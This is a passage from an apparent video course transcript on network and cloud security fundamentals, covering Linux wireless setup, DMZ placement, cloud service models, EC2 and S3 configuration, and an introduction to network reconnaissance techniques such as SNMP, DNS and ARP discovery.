case. Here it's right up against it. That also goes for the -i or interface parameter. I'm going to give it wlan0,
no space, -c for the config file, no space, it's called linksys.conf. And I will go ahead and press Enter. [He
executes the following command: wpa_supplicant -Dwext -iwlan0 -clinksys.conf.]
Now, after that's completed, if I type iwconfig, I can see that our wlan0 interface is now associated with the
linksys SSID. So we have an association with the access point. I could then use the dhclient command and
specify wlan0 to make sure that DHCP executes for the interface so that we get an IP address. And then I
can use the ifconfig command to show all my interfaces including wlan0, [He executes the following
command: ifconfig.] which we can see here now has an IP address. So, if we were to ping something, for
example, on the Internet to verify we have connectivity, we can see indeed that it is working. [He executes the
following command: ping www.google.com.]
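Pulling the whole Linux demo together, the command sequence looks roughly like this; the interface name wlan0 and the SSID linksys are the ones from the demo, and the passphrase is a placeholder you would replace with your own.

iw dev                                      # list wireless interfaces
iwlist wlan0 scan | grep SSID               # show the SSIDs of networks in range
wpa_passphrase linksys 'YourPassphrase' > linksys.conf
wpa_supplicant -B -Dwext -iwlan0 -clinksys.conf   # associate with the access point (-B runs it in the background)
dhclient wlan0                              # obtain an IP address via DHCP
ifconfig wlan0                              # confirm the address
ping -c 4 www.google.com                    # verify connectivity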
In this video, we learned how to use common wireless tools in Windows and Linux.
In this video, find out how to determine the placement of network devices.
Objectives
[Topic title: Internal and External Networks. The presenter is Dan Lachance.] The placement of network
services is a big part of security configuration. In this video, we'll talk about internal and external networks. An
internal network will contain sensitive IT systems, including things like directory servers – like an Active
Directory domain controller, file servers, database servers, and intranet web servers. Now encryption should
also be used for network traffic internally. Most networks tend to use it externally when transmitting e-mail or
connecting to an external web site, but we should also consider that many network attacks occur from the
inside.
So we should use encryption then for both data in motion – data being transmitted over the network; data at
rest – so encrypted hard disks and encrypted files. And we might also be required to do this for regulatory
compliance. That's definitely the case if you're looking for PCI-DSS compliance, for example if you're a retailer that deals
with cardholder information.
External networks are public facing, such as a demilitarized zone or DMZ. A DMZ is either a couple of
switchports or it could be an entire network segment that is visible to a public-facing network like the Internet,
but also has controlled access to an internal network. Now the DMZ is where you place things like VPN
appliances and public HTTP and FTP sites because they need to be reachable from the Internet. However, we
should never replicate data from our internal network to external. So, for example, if you use Microsoft Active
Directory domain controllers, you would never replicate from an internal domain controller to one that's in the
DMZ. We should also host logs outside of those devices or hosts in the DMZ because if it's in the DMZ, it's
reachable from the Internet and it potentially could be compromised. And a compromised host means that the
log files on that host are also compromised. So log forwarding should be configured to an internal secured
host. And you can do that on Windows as well as UNIX and Linux.
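As a rough sketch of what that log forwarding could look like on a Linux or UNIX host in the DMZ using rsyslog (the collector's IP address is a placeholder, and your environment might use a different syslog daemon or Windows Event Forwarding instead):

# /etc/rsyslog.d/60-forward.conf on the DMZ host
# "@@" forwards all messages over TCP; a single "@" would use UDP
*.* @@10.0.0.50:514
# Apply the change
sudo systemctl restart rsyslog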
Then there are cloud virtual networks where our on-premises network can be extended to a cloud virtual
network. It's kind of like having another network on-premises, except you really access it through the Internet.
This is often done through a site-to-site VPN link between your on-premises network and your public cloud
provider. Or you might even have a dedicated leased line between your site and the cloud provider that doesn't
go through the Internet. Then there are cellular networks which are also considered external. We don't control
them. Mobile device users, if you think about it, really present an enormous risk for malicious user entry into
the enterprise because if a smartphone is compromised, then any of the apps and data...now often data won't
actually be stored on the smartphone. But there are apps that users use to access sensitive data through the
phone. If the phone is compromised, potentially that data could be as well. So it's crucial that we think about
smartphones and tablets as computers. They should have a firewall, virus scanner, firmware updates, they
should be hardened, and so on.
Now all of those things are really more IT geek things. But, at the end of the day, the most important thing is
user awareness. People that use smartphones and tablets on work networks need to be aware: don't visit
web sites they should not be looking at, keep things up to date, and don't open e-mails they
were not expecting because they might be phishing attacks, and so on. DLP stands for data loss prevention. This
gives us central control of how apps and data can be used. You have to have a tool that does this. And it's often
used with mobile device management or MDM-centralized tools to manage mobile devices. So, for example,
what this means is we might have file attachments in a company e-mail app that can be accessed within the e-
mail or stored on corporate file servers, but can't be stored on a personal cloud storage account – we're
preventing that sensitive data loss. All internal and external devices need to be patched. They need to have
antimalware running and up to date. They need to have a personal firewall app configured appropriately for
your network and what should be allowed into the device and out of the device. And we should also be
encrypting both data in motion and data at rest. When we think about demilitarized zones – or DMZs – and
host placement, that's where we put anything that needs to be publicly accessible from the Internet. So, if you are using a VPN
solution, for example, so that travelling users and users that work from home can get into the
company network, then they need to be able to connect over the Internet to at least the VPN's public interface.
So normally, the VPN appliance would be in the DMZ or it might appear that way. You might actually be
using a reverse proxy that users connect to, which in turn forwards that connection to a VPN device on an
internal network elsewhere. There are many ways to configure it. But, generally speaking, we don't put sensitive
information in the DMZ. We put public-facing services that require Internet access there. Now many home
wireless routers, like the one I'm looking at here – my ASUS wireless router – will allow you to set up DMZ
configurations. The same idea is available, of course, at the corporate level using enterprise equipment. So here
I'm in my ASUS wireless router configuration tool. [The configuration page of the ASUS Wireless router
configuration tool opens.] Over on the left, I am going to click on WAN for wide area network since, as we
know, the DMZ really is public facing. [In the Advanced Settings subsection of the first section of the
configuration page, he clicks the WAN option. As a result, its information is displayed in the second section
which includes several tabs such as Internet Connection, Dual WAN, and Port Trigger.] Now what I want to
do here is click on the DMZ tab up at the top, and down below the DMZ has not been enabled. So I can choose
the Yes radio button where I can put in the IP address of a station or a device or a server that I want reachable
from the outside. Now, in a true enterprise environment, you will have many more configuration options than
this. But it's available even with standard consumer wireless products. In this video, we talked about internal
and external networks.
After completing this video, you will be able to explain the purpose of cloud computing.
Objectives
[Topic title: Cloud Concepts. The presenter is Dan Lachance.] In this video, we'll have a chat about cloud
concepts. Cloud computing is interesting because really we are using technological solutions that we've
already had for a while, we're just using them in a different way. Cloud computing has a number of
characteristics, one of which is on-demand and self-service. This means that at any time, we should be able to
connect over the Internet, for example, to some kind of a web interface and provision resources as needed. So,
for example, if I need more cloud storage because I've run out of space, I should be able to provision that
immediately. The next characteristic is broad network access. We should be able to connect from anywhere
over the Internet pretty much using any type of device – whether it's an app on a smartphone or using a web
browser on a desktop computer to provision and work with cloud services. Resource pooling refers to the fact
that cloud providers have the infrastructure – they've got virtualization servers that can run virtual machines.
They've got all the network switching and routing equipment and firewall equipment, VPN equipment, storage
arrays that we can provision using easy to navigate web interfaces. So all of the cloud customers, or tenants as
they're called, are essentially sharing from this resource pool.
Rapid elasticity refers to the fact that we can provision as well as de-provision cloud services as needed. So, in
our previous example where we need more cloud storage either personally or even at the enterprise level, we
can expand that storage immediately. In the same way, we can reduce that service as we don't need it. Another
way to look at it is with virtual machines. If I need to test something on a server operating system, I can spin
up our virtual machine in the cloud in minutes. And then, when I'm finished testing, de-provision it so I don't
get charged for it any more. So measured service is a big part of cloud computing where all of our utilization
of IT resources is measured. So, based on the amount of traffic into or out of a specific cloud service, you might be
charged a fee. You might also be charged for how much storage space you're using. Certainly, if you are
running virtual machines in the cloud, you're paying, well they're running. Often you pay by the hour – in some
cases, maybe by the minute. Certainly, if you're running database instances in the cloud, you're being charged.
It's absolutely crucial that, when you don't need a service in the cloud, you de-provision it because
otherwise you could get a nasty surprise at the end of the month when you look at the bill for your usage.
Cloud computing also includes different categories of services. For example, IaaS stands for Infrastructure as a
Service. And, of course, this is going to include things like storage and virtual machines and so on. Platform as
a Service, or PaaS, includes things like specific operating system platforms and database platforms and
developer platforms that we can use in the cloud instead of having that on our own network. Software as a
Service – or SaaS – deals with software that users can interact with where really most of the work is done by
the provider. Think of things like cloud-based e-mail or cloud-based office productivity tools like Google Docs
or Microsoft Office 365 – those are SaaS. We'll talk about those more in another video.
Cloud computing implies virtualization. Virtual machines are being used. Now, in some cases with some cloud
providers, when you provision resources – let's say you provision a Microsoft SQL Server database in the
cloud or a MySQL database – you might not see the intricacies related to the virtual machine that runs your
database, but it is running in a virtual machine instance.
Now, even though cloud computing implies virtualization, the opposite is not true. So, just because you might
be using virtual machines on your corporate on-premises network, that doesn't mean you've got a private cloud
because we have to think about all the characteristics that we talked about when we began this discussion –
things like broad network access, rapid elasticity, and so on.
SDN stands for software-defined networking. And this is a big deal with cloud computing. Now, if you think
of an on-premises network, if you want to add another network or a subnet, then normally what you'll do is
physically get more cables, maybe another switch. You might even configure a VLAN within your switch. In
the cloud, we just use a nice, easy to work with interface or web page, and it will modify underlying network
infrastructure owned by the cloud provider to provision things like VPNs or subnets that run in the cloud.
That's software-defined networking.
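For example, with the AWS command-line interface (a sketch only, not something shown in this course; the CIDR ranges are arbitrary), a new virtual network and subnet come into existence with a couple of API calls rather than any cabling:

# Create a virtual network (VPC) and capture its ID
VPC_ID=$(aws ec2 create-vpc --cidr-block 10.0.0.0/16 --query Vpc.VpcId --output text)
# Carve a subnet out of that network
aws ec2 create-subnet --vpc-id "$VPC_ID" --cidr-block 10.0.1.0/24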
Virtualization, as we said, doesn't imply cloud computing. In order to have a cloud – whether it's a private
cloud on your on-premises equipment that you control and own or in the public cloud – you've got to meet all
of those cloud characteristics that we discussed at the beginning of this chat. Private clouds mean that we have
those characteristics on company-controlled infrastructure. Public cloud, of course, means it's on cloud
provider infrastructure. Availability is very important because when you think about cloud computing,
especially public cloud computing, you're really trusting somebody else to host potentially crucial IT services.
And you've got a network connection that you need to have up and running to get to those services. So we
either connect over the Internet or through a dedicated leased line which doesn't use the Internet from our on-
premises network to the cloud. We could also have a site-to-site VPN, essentially a VPN tunnel, between our
network and the public cloud provider. Certainly, we should have redundant Internet connections. For instance,
if we're using the Internet, in case one connection goes down, we still need to be able to make a connection to
our IT services running in the cloud in some other way.
Then there is data replication. Now we could replicate data within provider data centers. This is common with
public cloud providers. For redundancy and availability of your data, it's replicated between different data
centers and, in some cases, even between different regions within a country. You may or may not pay an
extra fee for that redundancy; it really depends on the cloud provider. But that is an option. Now this provides
high availability. The other aspect related to this is that we – as IT and server people for on-premises networks
– can also configure replication from on-premises data sources to the cloud as well for high availability.
That could also be in the form of cloud backup. In this video, we discussed cloud concepts.
Upon completion of this video, you will be able to recognize the use of cloud service models.
Objectives
[Topic title: Cloud Service Models. The presenter is Dan Lachance.] In this video, I'll discuss cloud service
models. With cloud computing, as we've mentioned, we're really just using technology that we've had for a
while in a different way. And that's where the whole service model kicks in. With cloud computing, we pay as
we go. We have metered usage. This also applies to private clouds, where we
might use departmental chargeback within an organization to bill for IT service consumption by different departments within the company. So
it's a metered usage, meaning it's like electricity or water. You pay only for what you use. So, as a result, it's
important that you stop, disable, or delete deployed resources in the cloud when you aren't using them. Billing
might continue otherwise – you're going to pay more than you really need to. And, also at the same time,
because you've got more out there and more running that isn't necessary, it increases your attack surface.
The SLA is the service-level agreement. This is a contractual document between a cloud service provider and a
consumer that guarantees things like uptime, response time – which could relate to, for example, how quickly
your web site hosted in the cloud responds. It also could relate to how quickly tech support from the cloud
provider responds when there is an issue. Those types of things are what you will see within a service-level
agreement. [The aws.amazon.com web site is open. In this, the Amazon EC2 Service Level Agreement web
page is open.] For example, what you're seeing here is the Amazon Web Services EC2 Service Level
Agreement.
Now EC2 is used to deploy virtual machines into the Amazon cloud. So, as I scroll through the service-level
agreement, I can see the Service Commitment, the definition of terms, and any credits that might be provided
to consumers when Amazon Web Services doesn't keep up with their end of the agreement. There are many
different categories of cloud service models. Here we'll just talk about the three big ones – beginning with
Infrastructure as a Service or IaaS.
This means that the cloud provider has little management responsibility, it's on you – the cloud consumer –
because you might deploy things like virtual machines. So it's up to you what you call them, that they are
accessible, that they have the correct network addresses, and so on. The same goes for things like virtual
networks or cloud storage that you use in the cloud environment. It's up to you to deploy it correctly and to
determine what you need and how it should be configured. Platform as a Service, or PaaS, has some
management responsibility on the cloud provider, the rest is on you – the consumer. This is primarily used by
developers where there are developer tools, like web and worker roles for web apps, message queues where
one application component can drop a message that gets read by another component when the other component
is available instead of relying on it in real-time. That's called loose coupling when it comes to development.
Then there are database instances, like Microsoft SQL Server or the open-source MySQL, that you might
deploy in the cloud on Platform as a Service. Software as a Service or SaaS means that the cloud provider has
the most management responsibility compared to the other models like Infrastructure as a Service and Platform
as a Service.
So think of Google Apps, Office 365 – where, essentially, it's up to the cloud provider to keep those patched
and up and running. We just use those applications in the cloud, save our data. And that's pretty much our
responsibility as cloud consumers. In this video, we discussed cloud service models.
After completing this video, you will be able to recognize the role of virtualization in cloud computing.
Objectives
[Topic title: Virtualization. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
operating system virtualization. These days you can work with virtual machines either on-premises – so with
the equipment that is owned by you or your organization that is completely under your control – or you can
deploy virtual machine instances into the cloud on cloud provider equipment. Let's start with on-premises.
Here, I've got VMware Workstation. [The VMware Workstation window is open. Running along the top of the
window, there is a menu bar with several menus such as File, Edit, and View. Below the menu bar, several
tabs are open such as Home, Srv2012-1 - Server+, and Windows 10. The Home tab is selected by default. The
vmware Workstation 10 section is open in the Home tabbed page. It consists of several links such as Create a
New Virtual Machine, Open a Virtual Machine, and Virtualize a Physical Machine.]
Now there are many other virtualization tools you might be using like VirtualBox or Microsoft Hyper-V and so
on. However, notice here in VMware Workstation, if I were to click the Create a New Virtual Machine
link, [Dan clicks the Create a New Virtual Machine link. As a result, the New Virtual Machine Wizard
opens.] it starts a wizard where I'm asked questions about where the installer file or disc is for the operating
system. Here, I'll just leave it on "I will install the operating system later". Then I'm asked which flavor of the
Guest operating system it will be – Microsoft Windows, Linux, Novell NetWare, Solaris, UNIX, and so on.
And, as I proceed, I get to give it things like a name, a storage location, and so on. Now we can also deploy
virtual machines [He clicks the Cancel button of the New Virtual Machine Wizard.] in the cloud very quickly.
And, of course, we only get charged for what we're using while the virtual machine is running. Here, for
example, I'm using Amazon Web Services in the public cloud, [The amazon.com web site is open. In this, the
AWS Management Console web page is open. The presenter is logged in his account. Running along the top of
the web site, there are several drop-down menus such as AWS, Services, and Edit. The Amazon Web Services
section is open. It contains several subsections such as Compute, Developer Tools, and Management
Tools.] but I just as well could be using Rackspace or Microsoft Azure.
Here I'm going to go click on EC2, [In the Compute subsection, he clicks the EC2 option.] which is what is
used for virtual machines launched into the Amazon Web Services cloud. Now what I want to do in this
console is click on Instances on the left. [The EC2 Dashboard is open. It is divided into two sections. The first
section is a navigation pane. The second section displays the information on the basis of the selection made in
the first section. The navigation pane includes several expandable nodes such as INSTANCES, IMAGES, and
ELASTIC BLOCK STORE. In INSTANCES expandable node, he clicks the Instances option.] This should
show me any virtual machine instances I've already deployed in the cloud. Now, if I don't have any, of
course, [Due to the selection of Instances option, the second section displays its information. It includes two
buttons: Launch Instance and Connect. Adjacent to them, there is the Actions drop-down menu.] I can click
the Launch Instance button to do that. So, essentially, what I'm doing is building a virtual machine through a web-
based interface. [After clicking the Launch Instance button, a page opens which is titled Step 1: Choose an
Amazon Machine Image (AMI). It is divided into two sections. The first section is a navigation pane in which
Quick Start option is selected by default. Due to the selection made in the first section, its information is
displayed in the second section. The second section displays several virtual machine templates.] Here I've got
a gallery of essentially virtual machine templates for various Linux distributions. And, as I go further and
further down, I can see various Windows server operating systems that I can use when deploying a virtual
machine in the cloud. I can also click on the AWS Marketplace link on the left [He clicks the AWS
Marketplace option from the Navigation pane.] and search for specific virtual machine templates
that might have applications preconfigured or virtual appliances – like for network-attached storage and so on.
So, in this case, what I'm going to do is go back, do Quick Start, and I'll just choose Amazon Linux [He clicks
the Quick Start option in the navigation pane. Then from the second section, he selects the first virtual
machine template titled: Amazon Linux AMI 2016.03.3 (HVM), SSD Volume Type. He clicks the Select button
which is adjacent to this template.] and I'll just click Select. And, just like building a virtual machine on-
premises, it's going to ask me a number of questions. In this case, it wants to know the sizing type – in other
words – how many virtual CPUs or vCPUs, how much RAM, and so on. [Now a page opens which is titled
Step 2: Choose an Instance Type. It contains two drop-down menus: All instance types and Current
generation. Below them, there is a table of various available instances. The information displayed for every
instance is: Family, Type, vCPUs, Memory (GiB), Instance Storage (GB), EBS-Optimized Available, and
Network Performance.]
I'm just going to accept this and go to the next step [He clicks the Next: Configure Instance Details button. As
a result, a page opens which is titled Step 3: Configure Instance Details.] where I can determine which virtual
network in the cloud I want this to be deployed into, [The Configure Instance Details page opens which
includes several fields such as Network, Subnet, Auto-assign Public IP, and IAM role.] and whether it should
have a public IP address – I'm going to Enable that option. [He clicks the drop-down list box which is adjacent
to the Auto-assign Public IP field. He selects the Enable option.] So I'm just going to click the Review and
Launch button in the bottom right. [Now a page opens which is titled Step 7: Review Instance Launch. It
includes sections such as AMI Details and Instance Type. The page contains Cancel, Previous, and Launch
buttons.] I'll click the Launch button. Now, in the cloud, [The following dialog box opens: Select an existing
key pair or create a new key pair.] what's interesting about this specific cloud provider is that I have to create
– or in this case – choose an existing key pair that will be used to authenticate to that virtual machine. So I'm
going to acknowledge that I've got the private key portion that will allow me to authenticate. So then I would
just click Launch Instances. And, at this point, it's launching that virtual machine – in this case, it's using
Amazon Linux in the cloud. [The page titled Launch Status opens. It includes the following section: Your
instances are now launching. This section contains the following link: i-fb167b03.] So I can go ahead and
click on the link for that and see how it's doing. So it's very quick and easy to launch a virtual machine into the
cloud. It's equally easy in the future to remove it or stop it. [The section corresponding to the Instances
option opens again. It contains two buttons: Launch Instance and Connect. Adjacent to them, there is the
Actions drop-down menu. Below this, the status of the following Instance ID is displayed: i-
fb167b03. Below this, its information is displayed. The information contains the following tabs: Description,
Status Checks, Monitoring, and Tags. The Description tab is selected by default.] So, having a virtual machine
selected, I can go to the Actions button here, and under Instance State, I could Stop it or Terminate it – which
means delete it. [He clicks the Actions drop-down menu. Then a list of options appears, he refers to the
Instance Settings option. On clicking it, a flyout menu appears which includes options such as Stop and
Terminate.]
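The same stop and terminate actions can be scripted, which helps make sure nothing is left running. Here is a hedged sketch with the AWS command-line interface, using the instance ID from this demo:

# Stop the instance (it can be started again later; you stop paying for compute time)
aws ec2 stop-instances --instance-ids i-fb167b03
# Terminate the instance (this deletes it permanently)
aws ec2 terminate-instances --instance-ids i-fb167b03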
Now you want to make sure that you stop any cloud services when you no longer need them because
depending on the provider, you'll still be charged. So you don't want to leave virtual machines running for
months because you're still going to be paying for that usage even if you're not actually using them. Notice,
here at the top, I've got an option to connect to the selected virtual machine. So, when I click Connect – in this
case, because it's Linux, [He clicks the Connect button at the top. As a result, the Connect to Your Instance
dialog box opens. He refers to the options in the following field: I would like to connect with.] I can do it using
a standalone SSH client like PuTTY or I could use a Java SSH client in my web browser. Now I don't have to
do it this way. For example, I could simply use the free PuTTY tool to make a connection from my local
station over the Internet [He closes the Connect to Your Instance dialog box.] to that virtual machine in the
cloud, which we are going to do.
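For reference, on a Linux or macOS workstation the same connection could be made with the OpenSSH client instead of PuTTY; this is just a sketch, and the key file name and IP address are placeholders rather than values from this demo.

# Authenticate with the key pair's private key file; ec2-user is the default user on Amazon Linux
ssh -i my-keypair.pem ec2-user@203.0.113.10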
Now, before I do that though, I need to take note of either the Public DNS name down here or IP address of
this host. [Under the Description tab, he refers to the Public IP of the Instance ID.] I'm going to Copy the
Public IP address. Here, on my Windows station, I've downloaded and run the PuTTY tool [The PuTTY
Configuration dialog box is open.] where I've put in the public IP address of my cloud virtual machine. I'm
connecting over Port 22. [The dialog box is divided into two sections. The second section is titled Basic
options for your PuTTY session. He refers to the entries filled in the second section.] Because it's a Linux host,
I want to SSH to it. And I've also gone down here under Connection - SSH - Auth on the left [In the first
section, he clicks the Auth subnode which is under SSH subnode. And the SSH subnode is under the
Connection node.] and enabled agent forwarding because it requires public key authentication. I've already
loaded my private key to be able to do that. So now I would click Open. And, of course, it asks me to login.
So, in this particular case, I know the username that is required to authenticate, [The following window opens:
ec2-user@ip-10-0-0-186:~. In this, he types the following: ec2-user.] and I'm in. I am now logged in to my
Linux cloud-based virtual machine. In this video, we learned about server virtualization.
[Topic title: Cloud Security Options. The presenter is Dan Lachance.] In this video, I'll talk about cloud
security options. One of the big showstoppers with cloud computing adoption is trusting a third party to deal
with, perhaps, sensitive data or IT systems. And, in some cases, due to legal or regulatory reasons, you can't
use public cloud providers, you've got to deal with on-premises storage and running of IT systems.
The first thing to consider is: are public cloud providers hacking targets? Because there are thousands of tenants
sharing pooled IT resources. So aren't they a bigger target? Well, to a degree, there is some truth in that. But, at
the same time, with public cloud providers, economies of scale – because they have so many customers –
allow them to focus on strong security. It's in their interest because that's their business. And they also have to
go through third-party audit compliance constantly to make sure that their IT practices and systems are
hardened and trustworthy. There is also replication, both within and between different provider data centers.
This allows for high availability of IT systems as well as data. So it's part of business continuity to keep
business operations running even if we have an entire data center that's not reachable for some reason.
Then there is encryption of data in motion, data being transmitted over the network. Now that needs to be
done, of course, over the Internet, but also internally on internal networks or even private cloud networks
where you might deploy virtual machines that talk to each other only within that cloud virtual network. Data at
rest means that we've got stored data that should also be encrypted. Now we might have to manually encrypt
data before we store it in the cloud, or encryption might be available from the cloud provider. In this example, I am going
to upload a file to a cloud storage location. [The amazon.com web site is open. In this, the S3 Management
Console web page is open. Running along the top of the page, there are drop-down menus such as AWS,
Services, and Edit. Below this, there are buttons: Upload, Create Folder, None, Properties, and Transfers. The
None button is selected by default. Also there is an Actions drop-down menu adjacent to the Create Folder
button.] So here I'm just going to go to the Actions menu. And I'm going to choose Upload.
Now I've added a file to upload here; it's just a small text file. [The Upload - Select Files and Folders
wizard is open. Dan refers to the following file that he had added for upload: Project_A.txt. The wizard also
contains the following buttons: Set Details, Start Upload, and Cancel.] As I go through the wizard – here I'm
going to click Set Details at the bottom – notice I have the option to Use Server Side Encryption. [On clicking
the Set Details button, the section now contains several radio buttons and a checkbox. The Use Standard
Storage radio button is selected by default. He checks the following checkbox: Use Server Side Encryption.
Under this, the following radio button is selected by default: Use the Amazon S3 Service master key. The
wizard now contains the following buttons: Select Files, Set Permissions, Start Upload, and Cancel.] So this is
one way that we can deal with cloud encryption for data at rest.
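If you script uploads instead of using the console, the same server-side encryption can be requested from the AWS CLI. The following is a minimal, hedged sketch; the bucket name is a placeholder:
aws s3 cp Project_A.txt s3://my-example-bucket/ --sse AES256
# --sse AES256 asks S3 to encrypt the object at rest using the S3-managed master key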
We also have to think about the cloud provider and how they remove data. Of course, we can remove data stored in the
cloud ourselves, but other data remnants might still be available after the fact. Providers have specific
data-sanitizing practices they use to make sure that, when we delete data, nobody else can get to it. Then there is
virtual machine security, where we might configure things such that data center administrators can only start or stop
the virtual machines we create – or perhaps cannot even do that. That would depend on your cloud provider, how you structure your virtual machines, and
also what the provider supports. There is this concept called shielded virtual machines whereby the contents of
the virtual machine – running services and data – are completely inaccessible to data center administrators. All
they can do is essentially stop the VM.
Virtual networks are similar to creating a real network on-premises except it's done in the cloud on provider
equipment. So this is a network segment created in the cloud. We can also apply firewall rules for both
inbound and outbound traffic. Ideally, you want to configure those rules – if they're not already set up this way – to
deny all traffic by default. Then you can poke holes in that firewall for only what is needed. Whether you are using
Microsoft Azure, Rackspace, or – in this case – Amazon Web Services, they all have similar options. [The
amazon.com web site is open. In this, the VPC Management Console web page is open. In this web page, the
VPC Dashboard is open. The page is divided into sections. The first section is a navigation pane which
includes options such as Virtual Private Cloud and Security. Under the Virtual Private Cloud, the Your VPC's
suboption is selected by default. The second section displays the information on the basis of the selection made
in the first section. The second section contains a Create VPC button and an Actions drop-down menu. Below
this, it shows the status of the following VPC: PubVPC1. Its information is displayed below. The information
includes three tabs: Summary, Flow Logs, and Tags. The Summary tab is selected by default.] For example,
here I've got a PubVPC1 or a virtual private cloud. This is just a virtual network in the cloud.
Now, if I select it, down below under the summary area to the right, there is a network access control list or
network ACL for this network I've deployed in the cloud. And, if I click on the link for it, it opens up a new
window. And here I can control both inbound and outbound traffic – so traffic coming in to this network in the
cloud or leaving. [A second tab opens in the web browser. The amazon.com web site is open in it. In this, the
VPC Management Console web page is open. In this web page also, the VPC Dashboard is open. The second
section now contains a Create Network ACL button and a Delete button. The information of the following
Network ACL ID is displayed: acl-2b85aa4c. Below this, there are several tabs such as Summary, Inbound
Rules, and Outbound Rules. He clicks the Inbound Rules tab.] So I'm going to select the ACL from the list.
Down below, if I click Inbound Rules, I can see the rules that ALLOW traffic from certain locations or DENY
it. Of course, I could click the Edit button. And, if I really wanted to, I could add new rules. If I click Add
another rule, [He clicks the Add another rule button.] I can choose whether I want it to be for SMTP (25), SSH
(22), ALL Traffic, ALL TCP, ALL UDP, and so on and so forth. [He clicks the Search bar below the Create
Network ACL button and refers to the options that appear on clicking it.] I can also determine the port or Port
Range and the Source IP address or network from which the connection comes. Now that's Inbound
Rules. In the cloud, regardless of cloud provider, we can also control traffic leaving a network that's deployed
in the cloud. So there are outbound rules here down under the Outbound Rules tab.
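As a rough sketch of the same idea from the AWS CLI (the rule number and source network are placeholders), an inbound rule allowing SSH on this network ACL might look like this:
aws ec2 create-network-acl-entry --network-acl-id acl-2b85aa4c --ingress --rule-number 110 --protocol tcp --port-range From=22,To=22 --cidr-block 203.0.113.0/24 --rule-action allow
# allows inbound SSH (TCP 22) from one trusted network; anything not explicitly allowed still hits the default DENY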
Cloud computing implies virtualization whether we, as cloud customers, make the virtual machines ourselves
or whether they're built when we run some kind of a wizard for some cloud service. Virtual machines can be
created in the cloud from provider template galleries for a quick and easy deployment or you can manually
create virtual machines in the cloud yourself. You can even migrate existing on-premises virtual machines to
the cloud to reuse the investment you have already made in building VMs on premises. Now, when it
comes to hardening, you follow standard operating system hardening guidelines. There really is nothing
different about hardening a virtual machine in the cloud than there would be for a server you're hosting within
your own office network or your own data center. So things like following the principle of least privilege,
applying the latest software patches, reducing the amount of services, changing default configurations – that
stuff doesn't really change whether you are talking about a virtual machine in the cloud, the public cloud or a
physical server or a virtual machine running on-premises in your control.
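As a minimal, hedged sketch of what that looks like on a Linux VM (the package and service names are just examples), the same habits apply whether the machine is in the cloud or on-premises:
sudo yum update -y                    # apply the latest software patches
sudo systemctl disable --now cups     # disable services the server doesn't need
sudo passwd -l root                   # lock direct root logins; administer with least privilege via sudo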
Now cloud management interfaces normally use HTTPS. Normally, we administer our cloud services through
a web browser interface that's secured. We might also consider enabling auditing of activity so we can track
who deployed or deprovisioned what in the cloud and when. We can also use role-based administration so that
we might assign a role with permissions to certain users so they can do only what is required to get the job
done. Again, that adheres to the principle of least privilege. In this video, we discussed cloud concepts.
Table of Contents
After completing this video, you will be able to explain how to discover network devices.
Objectives
[Topic title: Topology, Service Discovery, and OS Fingerprinting. The presenter is Dan Lachance.] In this
video, I'll discuss topology, service discovery, and OS fingerprinting. Network intrusions always begin with
reconnaissance performed by the bad guys. This includes mapping out the network layout – so how the
network is laid out and also the devices and where they are laid out within that network infrastructure.
Documentation is used by the network owners and network technicians as a means of effective
troubleshooting. The more we know about how a network is laid out and where things are and what their
addresses are, what their names are, the better we are at troubleshooting and quickly resolving issues. But, if
that documentation falls into the wrong hands, it makes it very easy for malicious users to start trying to exploit
vulnerabilities that might exist. So this documentation, aside from troubleshooting, also allows the network
owners and network technicians to squeeze the absolute most performance out of what they have because they
can visualize where things are, how they're working, and optimize network links and network services and so
on.
Now, when we talk about discovering devices on a network through reconnaissance, that can happen in many,
many ways. One of those ways is through a Layer 2 type of discovery. Now Layer 2 of the OSI model is the
data-link layer where we might be able to discover things at the hardware layer on the local network only. So
things like MAC addresses come to mind when we talk about Layer 2. Layer 3 discovery can go outside of the
boundary of a local area network because Layer 3 – if you recall – of the OSI model is the network layer. It
deals with things like routers and routing of traffic from one network to another. And, at the software protocol
level, it deals with things like IP addresses.
SNMP is an old protocol – the Simple Network Management Protocol. And what's interesting about it is that
network devices use some kind of an SNMP agent that listens on UDP port 161. Now not every device will
have this SNMP agent listening, but often it is running automatically – whether we are talking about a software
appliance or even a hardware appliance on the network. Now the agent is listening on UDP port 161. We need
an SNMP server-side component that queries that SNMP agent on devices and looks through the MIBs on the
device. A MIB is a management information base that contains different types of information about that
specific device type. So, for example, if it's a network switch, we might have a MIB that shows us how
VLANs are configured, which devices are connected to which ports, how many devices are connected, amount
of traffic into and out of the switch as a whole or for each port – that type of information.
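For example, if an agent is listening and still has a default community string configured, a quick query from a Linux host might look like the following hedged sketch – the address and community string are placeholders:
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.1
# walks the system subtree of the MIB, returning details such as the device description, uptime, and contact information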
Topology discovery, aside from SNMP, can also occur by querying centralized resources on the network, like DHCP
servers. DHCP servers hand out IP configuration to client devices, so querying a DHCP server for a list of active
leases and their details would be a great way to learn what's on a network. Then there is also querying DNS servers,
where we could query for many types of records, including A records for IPv4 and AAAA (quad-A) records for IPv6.
So we can learn the names of devices, the names of hosts, and their corresponding IPs.
Now knowing the name of something can sometimes imply what it is – you know, a name like HR payroll server 1
is pretty indicative of what it is. And, if we find that name in DNS easily, we can also find the IP address for it. Now,
ideally, you're not going to be able to find that type of information in a public DNS server on the Internet. But,
if a malicious user can somehow get onto your internal network and query internal DNS servers, they very well
could find that type of information. So it takes one thing away from what they have to learn to get into the HR
payroll servers.
Topology discovery can also be done by querying other types of devices like routers – where routers maintain
information about network links that they are connected to. Routers also have memory – just like switches do,
just like servers do, and so on. On a router, the memory is used to store routing table entries. So it uses this
when it receives an inbound packet from an interface to determine the best way to route it through another
interface to some remote network somewhere. Each router will also communicate with other routers
using various protocols like the Cisco Discovery Protocol, CDP. That's a Layer 2 protocol used to
discover other types of devices and information about them – specifically routers on the same network link.
Then for Juniper systems, there is Juniper Discovery Protocol, or JDP.
Switches maintain information about their connected devices and how VLANs are configured. So, if a
malicious user can somehow do reconnaissance against a switch – maybe because there is a simple password to
remotely connect to it through SSH or, heaven forbid, we are using telnet to connect to the switch, which means
an attacker simply has to capture a valid user connecting to the switch and providing their credentials because
telnet doesn't encrypt or even encode anything – then that switch information is exposed. Another way to discover items on the network is through
Address Resolution Protocol cache discovery. Address Resolution Protocol or ARP is part of TCP/IP. And it's
used to basically resolve IP addresses to hardware MAC addresses on a local area network. So it can be used to
discover other active devices by looking at the ARP cache on each and every device. For example, on a
